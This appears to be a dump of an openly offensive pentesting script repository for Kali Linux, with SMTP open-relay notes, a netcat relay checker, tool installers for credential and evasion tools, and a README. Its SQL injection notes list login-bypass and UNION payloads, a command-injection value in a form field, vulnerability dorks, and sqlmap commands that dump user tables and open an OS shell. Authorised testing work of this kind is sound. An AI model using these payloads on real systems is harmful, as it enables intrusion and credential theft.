33 | S: 250 STARTTLS
34 | C: STARTTLS
35 | S: 220 Go ahead
36 | ------------------------------------------------------------------------------------------------------
37 | 
38 | # Internal IPs
39 | 
40 | When viewing test email, view the full headers and look for internal IPs and host names.
41 | ------------------------------------------------------------------------------------------------------
42 | 
43 | STARTTLS\r\nRSET\r\n
44 | 
45 | And the server sent the following two responses:
46 | 220 Server ready Ready to start TLS
47 | 250 +OK Reset
48 | ------------------------------------------------------------------------------------------------------
49 | 
50 | HELO <anything>
51 | Identical to/from - mail from: <nobody@domain> rcpt to: <nobody@domain>
52 | Unknown domain - mail from: <user@unknown_domain>
53 | Domain not present - mail from: <user@localhost>
54 | Domain not supplied - mail from: <user>
55 | Source address omission - mail from: <> rcpt to: <nobody@recipient_domain>
56 | Use IP address of target server - mail from: <user@IP_Address> rcpt to: <nobody@recipient_domain>
57 | Use double quotes - mail from: <user@domain> rcpt to: <"user@recipent-domain">
58 | User IP address of the target server - mail from: <user@domain> rcpt to: <nobody@recipient_domain@[IP Address]>
59 | Disparate formatting - mail from: <user@[IP Address]> rcpt to: <@domain:nobody@recipient-domain>
60 | Disparate formatting2 - mail from: <user@[IP Address]> rcpt to: <recipient_domain!nobody@[IP Address]>
61 | ------------------------------------------------------------------------------------------------------
62 | 
63 | #!/bin/bash
64 | clear
65 | 
66 | echo "SMTP open mail relay checker."
67 | 
68 | if [[ $1 == "" ]]; then
69 |      echo "ERROR - Specify host."
70 | else
71 |      if [[ $2 == "" ]]; then
72 |           PORT=25
73 |      else
74 |           PORT=$2
75 |      fi
76 | 
77 |      cat >> tmp << EOF
78 |      mail from: root@target.com
79 |      rcpt to: jsmith@gmail.com
80 |      data
81 |      Subject: Testing open mail relay.
82 |      Testing SMTP open mail relay from $1. 
83 |      Have a nice day.
84 |      .
85 |      quit
86 |      EOF
87 | 
88 |      echo "[*] Using target $1:$PORT"
89 |      cat tmp | nc $1 $PORT 
90 |      rm tmp
91 | fi
92 | 


--------------------------------------------------------------------------------
/update.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | clear
 4 | echo
 5 | echo
 6 | 
 7 | echo -e "\e[1;34mUpdating Kali.\e[0m"
 8 | apt-get update ; apt-get -y upgrade ; apt-get -y dist-upgrade ; apt-get -y autoremove ; apt-get -y autoclean ; echo
 9 | 
10 | if [ -d /opt/discover/.git ]; then
11 |      echo -e "\e[1;34mUpdating Discover scripts.\e[0m"
12 |      cd /opt/discover/ ; git pull ; echo
13 |      cp /opt/discover/alias /root/.bash_aliases ; source /root/.bash_aliases
14 | else
15 |      rm -rf /opt/scripts/
16 |      echo -e "\e[1;33mInstalling scripts into new location: /opt/discover/.\e[0m"
17 |      git clone git://github.com/leebaird/discover.git /opt/discover
18 |      echo
19 | fi
20 | 
21 | if [ -d /opt/easy-creds/.git ]; then
22 |      echo -e "\e[1;34mUpdating easy-creds.\e[0m"
23 |      cd /opt/easy-creds/ ; git pull
24 |      echo
25 | else
26 |      echo -e "\e[1;33mInstalling easy-creds.\e[0m"
27 |      git clone git://github.com/brav0hax/easy-creds.git /opt/easy-creds
28 |      ln -s /opt/easy-creds/easy-creds.sh  /usr/bin/easy-creds
29 |      echo
30 | fi
31 | 
32 | if [ ! -f /usr/bin/i586-mingw32msvc-c++ ]; then
33 |      echo -e "\e[1;33mInstalling Ming C Compiler.\e[0m"
34 |      apt-get -y install mingw32
35 |      echo
36 | fi
37 | 
38 | if [ ! -f /opt/google/chrome/google-chrome ]; then
39 |      echo -e "\e[1;33mInstalling Google Chrome.\e[0m"
40 |      wget https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb
41 |      dpkg -i google-chrome-stable_current_amd64.deb
42 |      head -n -1 /opt/google/chrome/google-chrome > temp.txt ; mv temp.txt /opt/google/chrome/google-chrome
43 |      echo 'exec -a "$0" "$HERE/chrome"  "$@" --user-data-dir' >> /opt/google/chrome/google-chrome
44 |      chmod +x /opt/google/chrome/google-chrome
45 |      rm google-chrome-stable_current_amd64.deb
46 |      echo
47 | fi
48 | 
49 | if [ -d /opt/rawr/.git ]; then
50 |      echo -e "\e[1;34mUpdating RAWR.\e[0m"
51 |      cd /opt/rawr/ ; git pull
52 |      echo
53 | else
54 |      echo -e "\e[1;33mInstalling RAWR.\e[0m"
55 |      git clone https://bitbucket.org/al14s/rawr.git /opt/rawr
56 |      /opt/rawr/install.sh y
57 | fi
58 | 
59 | if [ -d /opt/smbexec/.git ]; then
60 |      echo -e "\e[1;34mUpdating smbexec.\e[0m"
61 |      cd /opt/smbexec/ ; git pull
62 |      echo
63 | else
64 |      echo -e "\e[1;33mInstalling smbexec.\e[0m"
65 |      git clone git://github.com/pentestgeek/smbexec-2.git /opt/smbexec
66 |      ln -s /opt/smbexec/smbexec.rb  /usr/bin/smbexec
67 |      echo
68 | fi
69 | 
70 | if [ -d /opt/veil/.git ]; then
71 |      echo -e "\e[1;33mInstalling Veil-Evasion suite.\e[0m"
72 |      unlink /usr/bin/veil
73 |      rm -rf /opt/veil
74 |      apt-get -y install veil-evasion veil-catapult
75 |      echo
76 | fi
77 | 
78 | if [ ! -f /usr/share/windows-binaries/wce.exe ]; then
79 |      echo -e "\e[1;33mInstalling Windows Credential Editor.\e[0m"
80 |      wget http://www.ampliasecurity.com/research/wce_v1_4beta_universal.zip
81 |      unzip wce_v1_4beta_universal.zip
82 |      chmod 755 wce.exe
83 |      mv wce.exe /usr/share/windows-binaries/
84 |      rm Changelog LICENSE.txt README wce_v1_4beta_universal.zip
85 |      echo
86 | fi
87 | 
88 | echo -e "\e[1;34mUpdating locate database.\e[0m" ; updatedb
89 | 
90 | echo
91 | echo
92 | 


--------------------------------------------------------------------------------
/report/index.htm:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | 
 3 | <html>
 4 | 
 5 | <head>
 6 | <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
 7 | <title>Reporting Framework</title>
 8 | <link href='http://fonts.googleapis.com/css?family=Droid+Sans:400,700' rel='stylesheet' type='text/css'>
 9 | <link href="css/defaults.css" rel="stylesheet" type="text/css" />
10 | <link rel="stylesheet" href="css/style.css" type="text/css" />
11 | </head>
12 | 
13 | <body>
14 | 
15 | <div class="header nav">
16 | 	<div class="header-wrap container_12">
17 | 		<ul class="navbar">
18 | 			<li class="current"><a href="index.htm" onclick="populateDefault()">Home</a></li>
19 | 			<li><a href="#">Contacts</a>
20 | 			<ul>
21 |                     <li><a href="pages/emails.htm">Emails</a></li>
22 | 			     <li><a href="pages/names.htm">Names</a></li>
23 | 			</ul>         
24 | 			</li>
25 | 
26 | 			<li><a href="#">DNS</a>
27 | 			<ul>
28 | 			     <li><a href="pages/black-listed.htm">Black Listed</a></li>
29 | 			     <li><a href="pages/config.htm">Config</a></li>
30 | 			     <li><a href="pages/records.htm">Records</a></li>
31 | 			     <li><a href="pages/subdomains.htm">Subdomains</a></li>
32 | 			     <li><a href="pages/zonetransfer.htm">Zone Transfer</a></li>
33 | 			</ul>         
34 | 			</li>
35 | 
36 | 			<li><a href="#">Domain</a>
37 | 			<ul>
38 | 			     <li><a href="pages/hosts.htm">Hosts</a></li>
39 |                     <li><a href="pages/netcraft.htm">Netcraft</a></li>
40 | 			     <li><a href="pages/squatting.htm">Squatting</a></li>
41 | 			     <li><a href="pages/traceroute.htm">Traceroute</a></li>
42 | 			     <li><a href="pages/whois-domain.htm">Whois Domain</a></li>
43 | 			     <li><a href="pages/whois-ip.htm">Whois IP</a></li>
44 | 			</ul>         
45 | 			</li>
46 | 
47 | 			<li><a href="#">Files</a>
48 | 			<ul>
49 | 			     <li><a href="pages/xls.htm">Excel</a></li>
50 | 			     <li><a href="pages/pdf.htm">PDF</a></li>
51 | 			     <li><a href="pages/ppt.htm">PowerPoint</a></li>
52 | 			     <li><a href="pages/txt.htm">Text</a></li>
53 | 			     <li><a href="pages/doc.htm">Word</a></li>
54 | 			</ul>         
55 | 			</li>
56 | 
57 | 			<li><a href="#">Reports</a>
58 | 			<ul>
59 | 			     <li><a href="pages/active-recon.htm">Active Recon</a></li>
60 | 			     <li><a href="pages/passive-recon.htm">Passive Recon</a></li>
61 | 			</ul>         
62 | 			</li>
63 | 
64 | 			<li><a href="#">Web</a>
65 | 			<ul>
66 | 			     <li><a href="pages/loadbalancing.htm">Loadbalancing</a></li>
67 | 			     <li><a href="pages/waf.htm">Web App FW</a></li>
68 | 			     <li><a href="pages/whatweb.htm">Whatweb</a></li>
69 | 			</ul>         
70 | 			</li>
71 | 		</ul>
72 | 	</div>
73 | </div>
74 | 
75 | <div class="wrapper">
76 | 	<div class="container_12">
77 | 		<div class="main-content">
78 | 			<h2 class="page-header"><center><small class="lg-text">Easily browse <i>passive</i> and <i>active</i> recon for <a href="http://REPLACEDOMAIN" target="_blank">REPLACEDOMAIN</a>.</small></center></h2>
79 |                <br>
80 |                <br>
81 |                <br>
82 |                <br>
83 |                <center><img src="images/logo.png"></center>
84 |                <br>
85 |                <br>
86 | 		</div>
87 | 	</div>
88 | </div>
89 | 
90 | </body>
91 | 
92 | </html>
93 | 
94 | 


--------------------------------------------------------------------------------
/misc/python/multitabs.py:
--------------------------------------------------------------------------------
 1 | # multitabs.py
 2 | #
 3 | # By Lee Baird
 4 | # Feel free to contact me via chat or email with any feedback or suggestions that you may have:
 5 | # leebaird@gmail.com
 6 | #
 7 | ##############################################################################################################
 8 | 
 9 | os.system('clear')
10 | banner()
11 | 
12 | runlocally()
13 | 
14 | print colorblue.format('Open multiple tabs in Firefox with:')
15 | print
16 | print "1. List containing IPs and/or URLs."
17 | print "2. Directories from a domain\'s robot.txt."
18 | print "3. Previous menu"
19 | print
20 | choice = raw_input('Choice: ')
21 | 
22 | if choice == "1":
23 |      print
24 |      location = raw_input('Enter the location of your list: ')
25 | 
26 |      if os.path.isfile(location):
27 |           f = open(location,'r') # Setup a read connection directory
28 |           filedata = f.read() # Read the file
29 |           f.close() # Close the connection
30 |           filedata = filedata.split('\n') # Turn into a list
31 |           filedata = [x for x in filedata if not x == ""] # Ignore blank lines
32 | 
33 |           port = raw_input('Port: ')
34 | 
35 |           if port.isdigit():
36 |                if int(port) in range(1,65535):
37 |                     if port == "21":
38 |                          for i in filedata:
39 |                               webbrowser.open('ftp://'+i)
40 |                               time.sleep(1)
41 |                     elif port == "80":
42 |                          for i in filedata:
43 |                               webbrowser.open('http://'+i)
44 |                               time.sleep(1)
45 |                     elif port == "443":
46 |                          for i in filedata:
47 |                               webbrowser.open('https://'+i)
48 |                               time.sleep(1)
49 |                     else:
50 |                          for i in filedata:
51 |                               webbrowser.open('http://'+i+':'+port)
52 |                               time.sleep(1)
53 |                else:
54 |                     error()
55 |           else:
56 |                error()
57 |      else:
58 |           error()
59 | 
60 | if choice == "2":
61 |      print
62 |      print line
63 |      print
64 |      print 'Usage: target.com or target-IP'
65 |      print
66 |      domain = raw_input('Domain: ')
67 | 
68 |      # Check for no answer
69 |      if domain == "":
70 |           error()
71 | 
72 |      response = urllib2.urlopen('http://'+domain+'/robots.txt')
73 |      robots = response.read()
74 |      robots = robots.split('\n')
75 |      
76 |      for i in robots:
77 |           if 'Disallow' in i:
78 |                j = i.split(' ')
79 |                f = open(os.path.expanduser('~')+'/'+domain+'-robots.txt','a')
80 |                f.write(j[1]+'\n')
81 |                f.close()
82 |                webbrowser.open('http://'+domain+j[1])
83 |                time.sleep(1)
84 | 
85 |      print
86 |      print line
87 |      print
88 |      print '***Scan complete.***'
89 |      print
90 |      print 'The new report is located at /'+user+'/'+domain+'-robots.txt'
91 |      print
92 |      print
93 |      sys.exit(0)
94 | 
95 | if choice == "3":
96 |      main()
97 | else:
98 |      error()
99 | 


--------------------------------------------------------------------------------
/setup.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | clear
 4 | echo
 5 | echo
 6 | 
 7 | # Global variables
 8 | bdate=$(date +"%m-%d-%Y"-%R:%S)
 9 | user=$(whoami)
10 | 
11 | ##############################################################################################################
12 | 
13 | f_install_tools(){
14 | echo -e "\e[1;33mInstalling Filezilla.\e[0m"
15 | apt-get -y install filezilla
16 | echo
17 | echo -e "\e[1;33mInstalling gedit.\e[0m"
18 | apt-get -y install gedit
19 | echo
20 | echo -e "\e[1;33mInstalling xdotool.\e[0m"
21 | apt-get -y install xdotool
22 | echo
23 | }
24 | 
25 | ##############################################################################################################
26 | 
27 | f_verify_repos(){
28 | if [[ `grep -q kali-bleeding-edge /etc/apt/sources.list && grep -q kali-security /etc/apt/sources.list; echo $?` == 0 ]]; then
29 |      echo -e "\e[1;34mOur repos already exist.\e[0m"
30 |      echo
31 | else
32 |      echo -e "\e[1;33mNeed to add our repos.\e[0m"
33 |      f_install_repos
34 |      echo
35 | fi
36 | }
37 | 
38 | ##############################################################################################################
39 | 
40 | f_install_repos(){
41 | # Backup sources.list
42 | cp -p /etc/apt/sources.list /etc/apt/sources.list.$bdate.bak
43 | 
44 | # Remove all previous kali.org repo lines as well as ours in case of running setup multiple times 
45 | sed -i '/^#.$/d' /etc/apt/sources.list
46 | sed -i '/Security updates/d' /etc/apt/sources.list
47 | sed -i '/cdrom/d' /etc/apt/sources.list
48 | sed -i '/Regular repos/d' /etc/apt/sources.list
49 | sed -i '/Source repos/d' /etc/apt/sources.list
50 | sed -i '/Bleeding Edge repos/d' /etc/apt/sources.list
51 | sed -i '/kali.org/d' /etc/apt/sources.list
52 | 
53 | # Add remaining sources from sources.list after cleaning to temp file
54 | cat /etc/apt/sources.list > /tmp/sources.leftover
55 | 
56 | # Add our repo lines to new temp file
57 | echo > /tmp/sources.discoversetup
58 | echo "# Regular repos" >> /tmp/sources.discoversetup
59 | echo "deb http://repo.kali.org/kali kali main non-free contrib" >> /tmp/sources.discoversetup
60 | echo "deb http://security.kali.org/kali-security kali/updates main contrib non-free" >> /tmp/sources.discoversetup
61 | echo >> /tmp/sources.discoversetup
62 | 
63 | echo "# Source repos" >> /tmp/sources.discoversetup
64 | echo "deb-src http://repo.kali.org/kali kali main non-free contrib" >> /tmp/sources.discoversetup
65 | echo "deb-src http://security.kali.org/kali-security kali/updates main contrib non-free" >> /tmp/sources.discoversetup
66 | echo >> /tmp/sources.discoversetup
67 | 
68 | echo "# Bleeding Edge repos" >> /tmp/sources.discoversetup
69 | echo "deb http://repo.kali.org/kali kali-bleeding-edge main" >> /tmp/sources.discoversetup
70 | echo >> /tmp/sources.discoversetup
71 | 
72 | # Remove empty lines from top and merge file contents
73 | sed -i '/./,$!d' /tmp/sources.leftover
74 | olddata=$(cat /tmp/sources.leftover)
75 | newdata=$(cat /tmp/sources.discoversetup)
76 | echo -en "$newdata\n\n$olddata\n" > /etc/apt/sources.list
77 | echo -e "\e[1;33mDone installing repos.\e[0m"
78 | echo
79 | echo
80 | }
81 | 
82 | ##############################################################################################################
83 | 
84 | f_install_tools
85 | f_verify_repos
86 | 
87 | 


--------------------------------------------------------------------------------
/notes/git.txt:
--------------------------------------------------------------------------------
  1 | Cloning your fork
  2 | Clone the repository from your fork
  3 | 
  4 |    git clone git@github.com:<username>/<repo-name>.git
  5 |    git clone git@github.com:kraman/crankcase.git
  6 | 
  7 | Add the upstream repo so that you can pull changes
  8 | 
  9 |    git remote add upstream <original repo git url>
 10 |    git remote add upstream git@github.com:openshift/crankcase.git
 11 | 
 12 | 
 13 | Stop Errors pushing changes
 14 | 
 15 |     # Point this command to your fork of the repository
 16 |     git remote set-url origin git@github.com:<username>/<repo-name>.git
 17 | 
 18 | Working on a topic branch
 19 | 
 20 | Always try to avoid working on the master branch. It usually results in merge conflicts and/or update issues. Instead, work on a bug/feature/topic branch whenever possible.
 21 | 
 22 |    #start from the master branch
 23 |    git checkout master
 24 | 
 25 |    #create a new branch
 26 |    git branch dev/kraman/bug/12345
 27 | 
 28 |    #switch to the new branch
 29 |    git checkout dev/kraman/bug/12345
 30 | 
 31 |    #...make changes...
 32 | 
 33 | Staying updated
 34 | 
 35 | Once a fork has been created, it does not automatically track the upstream repository. Follow the steps outlined below to keep the master branch up-to-date.
 36 | 
 37 |    #pull the latest changes from upstream
 38 |    git fetch upstream
 39 |    git fetch upstream --tags
 40 | 
 41 |    #make sure there are no un-committed changes
 42 |    git stash
 43 | 
 44 |    #make sure we are working on the master branch
 45 |    git checkout master
 46 | 
 47 |    #merge the latest changes
 48 |    git merge upstream/master
 49 | 
 50 |    #push the updates changes to our GitHub fork
 51 |    git push origin master
 52 |    git push origin --tags
 53 | 
 54 |    #return to your bug/feature branch
 55 |    git checkout dev/kraman/bug/12345
 56 | 
 57 |    #rebase this branch onto latest code from master (expect conflicts)
 58 |    git rebase master
 59 | 
 60 |    #... resolve conflicts
 61 | 
 62 |    #push the rebased branch back to your fork
 63 |    git push origin dev/kraman/bug/12345 -f
 64 | 
 65 |    #Restore any un-committed changes
 66 |    git stash pop
 67 | 
 68 | NOTE: The git stash steps are optional. It is easier if you commit all changes before attempting a rebase.
 69 | 
 70 | 
 71 | Submitting a patch
 72 | 
 73 | Once your code is ready to be submitted, you will need to submit a pull request with your changes.
 74 | 
 75 |     Update your branch and make sure you are rebased off the latest upstream/master
 76 |     Squash your commits onto a single revision
 77 |     Submit a pull request on GitHub 
 78 | 
 79 | Squashing your changes into one revision
 80 | 
 81 | Before you can submit a request, rebase all your changes on to a single commit. This makes it easier to review and also makes reverting the code easier in case of any build breakages.
 82 | 
 83 |    git rebase -i master
 84 |    #... squash commits ...
 85 | 
 86 | # Deleting local and remote branches
 87 | 
 88 | 	#local
 89 | 	git branch -D <branchname>
 90 | 
 91 | 	#remote
 92 | 	git push origin --delete <branchname>
 93 | 
 94 | # Creating a branch and checkout at the same time
 95 | 
 96 |     To create a branch and switch to it at the same time, you can run the git checkout command with the -b switch:
 97 | 
 98 |      git checkout -b iss53
 99 |     Switched to a new branch 'iss53'
100 | 
101 | # Testing PR's locally
102 | 
103 |    https://help.github.com/articles/checking-out-pull-requests-locally
104 |    fetch = +refs/pull/*/head:refs/pull/origin/*
105 | 
106 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
  1 | Formerly BackTrack scripts. For use with Kali Linux. Custom bash scripts used to automate various pentesting tasks.
  2 | 
  3 | ### Download, setup & usage
  4 | * If using Kali mini ```apt-get install windows-binaries```
  5 | * git clone git://github.com/leebaird/discover.git /opt/discover/
  6 | * All scripts must be ran from this location.
  7 | * cd /opt/discover/
  8 | * ./setup.sh
  9 | * ./discover.sh
 10 | 
 11 | ```
 12 | RECON
 13 | 1.  Domain
 14 | 2.  Person
 15 | 3.  Parse salesforce
 16 | 
 17 | SCANNING
 18 | 4.  Generate target list
 19 | 5.  CIDR
 20 | 6.  List
 21 | 7.  IP or domain
 22 | 
 23 | WEB
 24 | 8.  Open multiple tabs in Iceweasel
 25 | 9.  Nikto
 26 | 10. SSL
 27 | 
 28 | MISC
 29 | 11. Crack WiFi
 30 | 12. Parse XML
 31 | 13. Start a Metasploit listener
 32 | 14. Update
 33 | 15. Exit
 34 | ```
 35 | ## RECON
 36 | ### Domain
 37 | ```
 38 | RECON
 39 | 
 40 | 1.  Passive
 41 | 2.  Active
 42 | 3.  Previous menu
 43 | ```
 44 | 
 45 | * Passive combines goofile, goog-mail, goohost, theHarvester, Metasploit, dnsrecon, URLCrazy, Whois and multiple webistes.
 46 | * Active combines Nmap, dnsrecon, Fierce, lbd, WAF00W, traceroute and Whatweb.
 47 | 
 48 | ### Person
 49 | ```
 50 | RECON
 51 | 
 52 | First name:
 53 | Last name:
 54 | ```
 55 | 
 56 | * Combines info from multiple websites.
 57 | 
 58 | ### Parse salesforce
 59 | ```
 60 | Create a free account at salesforce (https://connect.data.com/login).
 61 | Perform a search on your target company > select the company name > see all.
 62 | Copy the results into a new file.
 63 | 
 64 | Enter the location of your list: 
 65 | ```
 66 | 
 67 | * Gather names and positions into a clean list.
 68 | 
 69 | ## SCANNING
 70 | ### Generate target list
 71 | ```
 72 | SCANNING
 73 | 
 74 | 1.  Local area network
 75 | 2.  NetBIOS
 76 | 3.  netdiscover
 77 | 4.  Ping sweep
 78 | 5.  Previous menu
 79 | ```
 80 | 
 81 | * Use different tools to create a target list including Angry IP Scanner, arp-scan, netdiscover and nmap pingsweep.
 82 | 
 83 | ### CIDR, List, IP or domain
 84 | ```
 85 | Type of scan: 
 86 | 
 87 | 1.  External
 88 | 2.  Internal
 89 | 3.  Previous menu
 90 | ```
 91 | 
 92 | * External scan will set the nmap source port to 53 and the max-rrt-timeout to 1500ms.
 93 | * Internal scan will set the nmap source port to 88 and the max-rrt-timeout to 500ms.
 94 | * Nmap is used to perform host discovery, port scanning, service enumeration and OS identification. 
 95 | * Matching nmap scripts are used for additional enumeration.
 96 | * Matching Metasploit auxiliary modules are also leveraged.
 97 | 
 98 | ## WEB
 99 | ### Open multiple tabs in Iceweasel
100 | ```
101 | Open multiple tabs in Iceweasel with:
102 | 
103 | 1.  List
104 | 2.  Directories from a domain's robot.txt.
105 | 3.  Previous menu
106 | ```
107 | 
108 | * Use a list containing IPs and/or URLs.
109 | * Use wget to pull a domain's robot.txt file, then open all of the directories.
110 | 
111 | ### Nikto
112 | ```
113 | Run multiple instances of Nikto in parallel.
114 | 
115 | 1.  List of IPs.
116 | 2.  List of IP:port.
117 | 3.  Previous menu
118 | ```
119 | ### SSL
120 | ```
121 | Check for SSL certificate issues.
122 | 
123 | Enter the location of your list: 
124 | ```
125 | 
126 | * Use sslscan and sslyze to check for SSL/TLS certificate issues.
127 | 
128 | 
129 | ## MISC
130 | ### Crack WiFi
131 | 
132 | * Crack wireless networks.
133 | 
134 | ### Parse XML
135 | ```
136 | Parse XML to CSV for use with /discover/misc/worksheet.xlsx.
137 | 
138 | 1.  Burp
139 | 2.  Nessus
140 | 3.  Nmap
141 | 4.  Previous menu
142 | ```
143 | 
144 | ### Start a Metasploit listener
145 | 
146 | * Setup a multi/handler with a windows/meterpreter/reverse_tcp payload on port 443.
147 | 
148 | 
149 | ### Update
150 | 
151 | * Use to update Kali Linux, Discover scripts, various tools and the locate database.
152 | 


--------------------------------------------------------------------------------
/notes/sqli.txt:
--------------------------------------------------------------------------------
 1 | SQL Injection
 2 | 
 3 | 
 4 | Check for SQLi by adding and single quote or the following: ‘ or 1=1--<space>
 5 | 
 6 | http://www.target.com/index.php?val=100’ 
 7 | http://www.target.com/index.php?val=100’ or ‘1’=’1 
 8 | 
 9 | Username: ' or 1=1--<space>
10 | Password:
11 | 
12 | Try to login as a specific user.
13 | Username: bob
14 | Password: ' or (1=1 and username = 'bob')--<space>
15 | 
16 | Database version
17 | Username: +convert(varchar,convert(int,@@version))+
18 | ------------------------------------------------------------------------------------------------------
19 | 
20 | # Google Dorks
21 | 
22 | inurl:index.php?id=
23 | inurl:gallery.php?id=
24 | inurl:article.php?id=
25 | inurl:pageid=
26 | ------------------------------------------------------------------------------------------------------
27 | 
28 | SQL databases interpret the single quote character as the boundary between code and data. It assumes that 
29 | anything following a single quote is code that it needs to run and anything encapsulated by a quote is data.
30 | 
31 | Example: SELECT * FROM products WHERE price < '100' ORDER BY description;
32 | 
33 | ' and 1=0/@@version;--
34 | ' and 1=0/user;--
35 | ' having 1'='1
36 | ' GROUPED BY productid having '1'='1
37 | ' GROUPED BY productid,name having '1'='1
38 | ------------------------------------------------------------------------------------------------------
39 | 
40 | MS-SQL server concatenates numbers, it does not add them. '10' + '0' would equal 100 not 10.
41 |  
42 | SELECT * FROM table1 WHERE condition1
43 | union all
44 | 
45 | SELECT * FROM table2 WHERE condition2
46 | 
47 | OS - @@version
48 |   Server instances - @@servername
49 |     Databases
50 |       Tables
51 |         Columns
52 | 
53 | SELECT name FROM master..sysdatabases
54 | ------------------------------------------------------------------------------------------------------
55 | 
56 | http://target.com/bookservice/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(0))—
57 | http://target.com/article.aspx?article_id=0+UNION+SELECT+EMAIL,+USERID,+PASSWORD+FROM+USERS
58 | Newsletter signup > Subscribe:  joe@gmail.com & ipconfig > C:\inetpub\wwwroot\Book\test.txt
59 | ------------------------------------------------------------------------------------------------------
60 | 
61 | Use Burp to trap a request. Copy the request to /root/tmp.
62 | 
63 | sqlmap -r /root/tmp
64 | sqlmap -r /root/tmp -p <parameter> --current-user        Show the user the web server is using to talk to the db
65 | sqlmap -r /root/tmp -p <parameter> -U <user> --passwords
66 | sqlmap -r /root/tmp --dbs                                Search for all dbs
67 | sqlmap -r /root/tmp -D <database> --tables               Show all tables in db
68 | sqlmap -r /root/tmp -D <database> -T <table> --dump      Show all data in table
69 | ------------------------------------------------------------------------------------------------------
70 | 
71 | From: http://niiconsulting.com/checkmate/2014/01/from-sql-injection-to-0wnage-using-sqlmap/
72 | 
73 | sqlmap.py --url=”http://target.com/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#”
74 | --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee"
75 | 
76 | sqlmap.py --url="http://target.com/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" 
77 | --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" --dbs
78 | 
79 | sqlmap.py --url="http://target.com/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" 
80 | --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" -D dvwa --tables
81 | 
82 | sqlmap.py --url="http://target.com/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"
83 | --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" -D dvwa -T users --columns
84 | 
85 | sqlmap.py --url="http://target.com/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" 
86 | --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" -D dvwa -T users 
87 | -C user_id,user,password --dump
88 | 
89 | sqlmap.py --url="http://target.com/login.asp" --data="txtLoginID=shrikant&txtPassword=password&cmdSubmit=Login" 
90 | --os-shell
91 | ------------------------------------------------------------------------------------------------------
92 | 
93 | 


--------------------------------------------------------------------------------
/notes/nexpose.txt:
--------------------------------------------------------------------------------
  1 | Nexpose
  2 | 
  3 | 
  4 | # Copy Full audit
  5 |      Service Discovery:
  6 |           Add TCP ports 3200, 3201 and 15000
  7 |           Add UDP port 4045
  8 | 
  9 | # Copy Web audit
 10 |      General - turn off Policies
 11 |      Vulnerability Checks > Selected Checks > By Check Type > Disabled:
 12 |           Microsoft hotfix, Patch, RPM, Sun patch, Version, Windows registry and Policy
 13 |      Web Servers - turn on Enable adaptive HTTP fingerprinting
 14 |      Web Spidering - turn on Check use of common user names and passwords
 15 | 
 16 | # Vulnerabilities
 17 |      ICMP timestamp response
 18 |      TCP Sequence Number Approximation Vulnerability
 19 |      TCP timestamp response
 20 |      UDP IP ID Zero
 21 | 
 22 |      Exclude > Reason: Acceptable Risk > Submit and approve
 23 | ------------------------------------------------------------------------------------------------------
 24 | 
 25 | # Create PDF reports
 26 |      Audit Report
 27 |      Executive Overview
 28 |      Remediation Plan
 29 |      Top Remediations with Details
 30 | ------------------------------------------------------------------------------------------------------
 31 | 
 32 | # Creat custom SQL query for Hosts
 33 | 
 34 | SELECT da.ip_address AS "IP Address", da.host_name AS "Host", 
 35 |      dos.name AS "OS", dos.version AS "OS Version", 
 36 |      das.port AS "Port", 
 37 |      dp.name AS "Protocol", 
 38 |      ds.name AS "Service", 
 39 |      dsf.name AS "Name", dsf.version AS "Version"
 40 | 
 41 | FROM dim_asset_service das
 42 |      JOIN dim_asset da USING (asset_id)
 43 |      JOIN dim_operating_system dos USING (operating_system_id)
 44 |      JOIN dim_protocol dp USING (protocol_id)
 45 |      JOIN dim_service ds USING (service_id)
 46 |      JOIN dim_service_fingerprint dsf USING (service_fingerprint_id)
 47 | 
 48 | ORDER BY da.ip_address, das.port
 49 | ------------------------------------------------------------------------------------------------------
 50 | 
 51 | # Creat custom SQL query for Findings
 52 | 
 53 | WITH
 54 |      vulnerability_cves AS (
 55 |           SELECT vulnerability_id, array_to_string(array_agg(reference), ',') AS cves
 56 |           FROM dim_vulnerability_reference
 57 |           WHERE source = 'CVE'
 58 |           GROUP BY vulnerability_id
 59 |      ),
 60 |      vulnerability_disa_vmskey AS (
 61 |           SELECT vulnerability_id, array_to_string(array_agg(reference), ',') AS disa_vmskey
 62 |           FROM dim_vulnerability_reference
 63 |           WHERE source = 'DISA_VMSKEY'
 64 |           GROUP BY vulnerability_id
 65 |      ),
 66 |     vulnerability_disa_severity AS (
 67 |           SELECT vulnerability_id, array_to_string(array_agg(reference), ',') AS disa_severity
 68 |           FROM dim_vulnerability_reference
 69 |           WHERE source = 'DISA_SEVERITY'
 70 |           GROUP BY vulnerability_id
 71 |      ),
 72 |      rolled_up_solutions AS (
 73 |           SELECT asset_id, vulnerability_id, COALESCE(dss.superceding_solution_id, davs.solution_id) AS solution_id
 74 |           FROM dim_asset_vulnerability_solution davs
 75 |           LEFT OUTER JOIN dim_solution_supercedence dss USING (solution_id)
 76 |      )
 77 | 
 78 | SELECT ROUND(cvss_score::numeric, 1) AS "CVSS Score",
 79 |      da.ip_address AS "IP Address", da.host_name AS "Host",
 80 |      dos.name AS "OS", dos.version AS "OS Version",
 81 |      dv.title AS "Vulnerability", proofAsText(dv.description) AS "Description",
 82 |      proofAsText(favi.proof) AS "Proof",
 83 |      ds.summary AS "Remediation",
 84 |      proofAsText(ds.fix) AS "Steps",
 85 |      vcves.cves AS "CVE",
 86 |      disa_vmskey AS "DISA VMS Key",
 87 |      disa_severity AS "DISA Severity"
 88 | 
 89 | FROM fact_asset_vulnerability_instance favi
 90 |      JOIN dim_asset da USING (asset_id)
 91 |      JOIN dim_operating_system dos USING (operating_system_id)
 92 |      JOIN dim_vulnerability dv USING (vulnerability_id)
